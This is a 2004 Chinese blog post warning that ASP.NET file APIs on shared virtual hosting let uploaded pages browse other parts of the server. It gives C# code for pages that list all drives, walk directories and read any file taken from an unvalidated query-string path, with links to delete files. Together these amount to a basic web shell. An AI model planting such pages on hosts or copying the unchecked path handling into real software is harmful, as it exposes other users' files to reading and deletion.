ASP.NET的安全隐患—文件操作

.net的文件操作存在巨大的安全隐患,写了几个文件传到虚拟主机上,不但可以看到主机上的文件,甚至还可以进行删除等一系列的文件操作
得的驱动器目录

getit.aspx.cs

            string[] drivers=Directory.GetLogicalDrives();
            
int NumOfDriver=drivers.Length;
            
for(int i=0;i<NumOfDriver;i++)
            
{
                Response.Write(
"<a href=listdir.aspx?dir=" + Server.UrlEncode(drivers[i]) + ">" + drivers[i] + "</a><br>");
            }

listdir.aspx.cs获得文件

string strDir=Request.QueryString.Get("dir");
            
try
            
{
                DirectoryInfo theDir
=new DirectoryInfo(strDir);
                Response.Write(strDir 
+ "  建立时间:" + theDir.CreationTime.ToString() + "<br>");
                
//获得子目录
                DirectoryInfo[] subDir=theDir.GetDirectories();
                Response.Write(
"文件夹");
                
for(int i=0;i<subDir.Length;i++)
                
{
                    Response.Write(
"<br><a href=listdir.aspx?dir=" + Server.UrlEncode(subDir[i].FullName) + ">" + subDir[i].FullName  + "</a>");
                }

                Response.Write(
"<br>");
                
//获得文件
                Response.Write("文件");
                FileInfo[] theFiles
=theDir.GetFiles();
                
for(int i=0;i<theFiles.Length;i++)
                
{
                    Response.Write(
"<br><a href=showfile.aspx?file=" + Server.UrlEncode(theFiles[i].FullName) + ">" +theFiles[i].FullName + "</a>");
                    Response.Write(
"&nbsp;&nbsp;<a href=delfile.aspx?file=" + Server.UrlEncode(theFiles[i].FullName) + ">删除</a>");
                }

            }

            
catch(Exception ex)
            
{
                Response.Write(ex.ToString());
            }


showfile.aspx.cs读取文件信息

            string strFile=Request.QueryString.Get("file");
            FileInfo file
=new FileInfo(strFile);
            Response.Write(
"<br>");
            Response.Write(
"<br>名称:" + file.Name);
            Response.Write(
"<br>路径:" + file.FullName);
            Response.Write(
"<br>当前目录:" + file.Directory);
            Response.Write(
"<br>建立时间:" + file.CreationTime.ToString());
            Response.Write(
"<br>大小:" + file.Length.ToString() + "Bytes");
            Response.Write(
"<br>上次访问时间:" + file.LastAccessTime.ToString());
            Response.Write(
"<br>上次修改时间:" + file.LastWriteTime.ToString());
            Response.Write(
"<br>");
            Response.Write(
"Open with text(读取一定数量字符)" + "<br>");

            StreamReader reader
=file.OpenText();
            
char[] buffer=new char[255];
            
int nRead=reader.ReadBlock(buffer,0,255);
            Response.Write(
"<pre>");
            Response.Write(Server.HtmlEncode(
new String(buffer,0,nRead)));
            Response.Write(
"</pre>");

 

 

posted on 2004-08-28 09:56  骇狗  阅读(1455)  评论(3编辑  收藏  举报

导航